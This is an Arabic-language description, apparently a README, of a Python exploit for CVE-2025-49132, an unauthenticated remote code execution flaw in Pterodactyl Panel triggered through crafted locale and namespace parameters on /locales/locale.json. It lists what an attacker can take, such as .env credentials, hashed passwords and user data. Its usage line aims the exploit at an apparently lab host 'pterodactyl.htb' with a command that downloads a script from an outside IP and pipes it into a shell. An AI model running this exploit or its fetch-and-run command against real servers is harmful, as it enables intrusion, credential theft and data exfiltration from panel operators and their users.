
استغلال بايثون لـ CVE-2025-49132، يتيح تنفيذ أوامر عن بعد دون مصادقة على Pterodactyl Panel عبر معاملات locale و namespace مصمّمة.
تأثير
باستخدام ملف /locales/locale.json مع معامِلات الاستعلام locale و namespace، يمكن للمهاجم الخبيث تنفيذ كود عشوائي، دون الحاجة إلى المصادقة.
مع القدرة على تنفيذ كود عشوائي، يمكن استغلال هذه الثغرة بعدد لا حصر له من الطرق. يمكن استخدامها للوصول إلى خادم اللوحة، قراءة بيانات الاعتماد من تكوين اللوحة (.env أو غيره)، استخراج معلومات حساسة من قاعدة البيانات (مثل تفاصيل المستخدم [اسم المستخدم، البريد الإلكتروني، الاسم الأول والأخير، كلمة المرور المُشفَّرة، عناوين IP، إلخ])، الوصول إلى ملفات الخوادم التي تديرها اللوحة، إلخ.
كيفية الاستخدام
python exploit.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh'